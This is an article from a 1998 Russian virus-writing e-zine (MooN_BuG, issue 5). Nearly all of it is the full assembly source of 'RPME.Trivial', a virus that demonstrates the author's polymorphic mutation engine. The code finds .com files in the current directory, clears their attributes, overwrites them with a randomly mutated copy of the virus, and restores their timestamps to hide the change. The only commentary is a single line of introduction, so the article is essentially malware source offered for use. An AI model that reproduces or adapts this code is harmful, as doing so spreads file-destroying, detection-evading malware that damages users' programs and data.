[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 5, May 1998 file 00e
Пример использования RPME
by RedArc
А чего здесь говорить? Смотрите: нерезидентный COM-overwrite вирус, поиск
в текущем каталоге. Там вроде бы все понятно ;)
=== Cut ===
;RPME.Trivial (c) by RedArc // TAVC
Model Tiny
.code
.286
jumps
org 100h
start:
jmp VirBeg
include rnd.inc
include rpme.inc
VirBeg:
mov si,100h-1
mov di,100h+Buff
mov cx,MyLength
call RPME
mov word ptr cs:[BuffLength+100h],cx
mov ah,4eh
mov cx,0ffh
mov dx,MASK_offs+100h
Interrupt:
int 21h
jb NotFound
jmp Infect
NotFound:
int 20h
Infect:
mov dx,9eh
mov ax,4301h
xor cx,cx
int 21h
mov dx,9eh
mov ax,3d02h
int 21h
xchg ax,bx
mov ah,40h
mov dx,Buff+100h
mov cx,word ptr cs:[BuffLength+100h]
int 21h
;----------
push bx
cld
mov bx,5
call RND
xchg ax,dx
mov dl,2
mul dl
xchg ax,dx
mov di,NIP_Table1+100h
add di,dx
mov si,word ptr ds:[di]
add si,100h
mov di,PIP1
add di,100h
mov cx,PIPS_1_Length
rep movsb
;----------
mov bx,5
call RND
xchg ax,dx
mov dl,2
mul dl
xchg ax,dx
mov di,NIP_Table2+100h
add di,dx
mov si,word ptr ds:[di]
add si,100h
mov di,PIP2
add di,100h
mov cx,PIPS_2_Length
rep movsb
;----------
mov bx,5
call RND
xchg ax,dx
mov dl,2
mul dl
xchg ax,dx
mov di,NIP_Table3+100h
add di,dx
mov si,word ptr ds:[di]
add si,100h
mov di,PIP3
add di,100h
mov cx,PIPS_3_Length
rep movsb
pop bx
;----------
mov ah,40h
mov dx,NewIp+100h
mov cx,NIPLength
int 21h
mov ax,5701h
mov cx,word ptr cs:[96h]
mov dx,word ptr cs:[98h]
int 21h
mov ah,3eh
int 21h
mov ax,4301h
mov cx,word ptr cs:[95h]
int 21h
mov ah,4fh
jmp Interrupt
NewIp equ $-start
NIP:
std
PIP1 equ $-start
mov cx, 100h+MyLength-1
push cx
PIP2 equ $-start
mov di, MyLength / 2 + 1
push di
pop cx
pop di
LP1:
pop ax
stosw
loop LP1
PIP3 equ $-start
mov di,100h
push di
ret
NIPLength equ $-NIP
NIP_Table1 equ $-start
dw PIPS_1, PIPS_1_1, PIPS_1_2, PIPS_1_3, PIPS_1_4, PIPS_1_5
NIP_Table2 equ $-start
dw PIPS_2, PIPS_2_1, PIPS_2_2, PIPS_2_3, PIPS_2_4, PIPS_2_5
NIP_Table3 equ $-start
dw PIPS_3, PIPS_3_1, PIPS_3_2, PIPS_3_3, PIPS_3_4, PIPS_3_5
MASK_offs equ $-start
db '*.com',0h
PIPS_1 equ $-start
PIPS_1_:
mov ax, 100h+MyLength-1
push ax
PIPS_1_Length equ $-PIPS_1_
PIPS_1_1 equ $-start
mov bx, 100h+MyLength-1
push bx
PIPS_1_2 equ $-start
mov cx, 100h+MyLength-1
push cx
PIPS_1_3 equ $-start
mov dx, 100h+MyLength-1
push dx
PIPS_1_4 equ $-start
mov si, 100h+MyLength-1
push si
PIPS_1_5 equ $-start
mov di, 100h+MyLength-1
push di
PIPS_2 equ $-start
PIPS_2_:
mov ax, MyLength / 2 + 1
push ax
PIPS_2_Length equ $-PIPS_2_
PIPS_2_1 equ $-start
mov bx, MyLength / 2 + 1
push bx
PIPS_2_2 equ $-start
mov cx, MyLength / 2 + 1
push cx
PIPS_2_3 equ $-start
mov dx, MyLength / 2 + 1
push dx
PIPS_2_4 equ $-start
mov si, MyLength / 2 + 1
push si
PIPS_2_5 equ $-start
mov di, MyLength / 2 + 1
push di
PIPS_3 equ $-start
PIPS_3_:
mov ax,100h
push ax
PIPS_3_Length equ $-PIPS_3_
PIPS_3_1 equ $-start
mov bx,100h
push bx
PIPS_3_2 equ $-start
mov cx,100h
push cx
PIPS_3_3 equ $-start
mov dx,100h
push dx
PIPS_3_4 equ $-start
mov si,100h
push si
PIPS_3_5 equ $-start
mov di,100h
push di
MyLength equ $-start
BuffLength equ $-start
dw ?
Buff equ $-start
end start
=== Cut ===
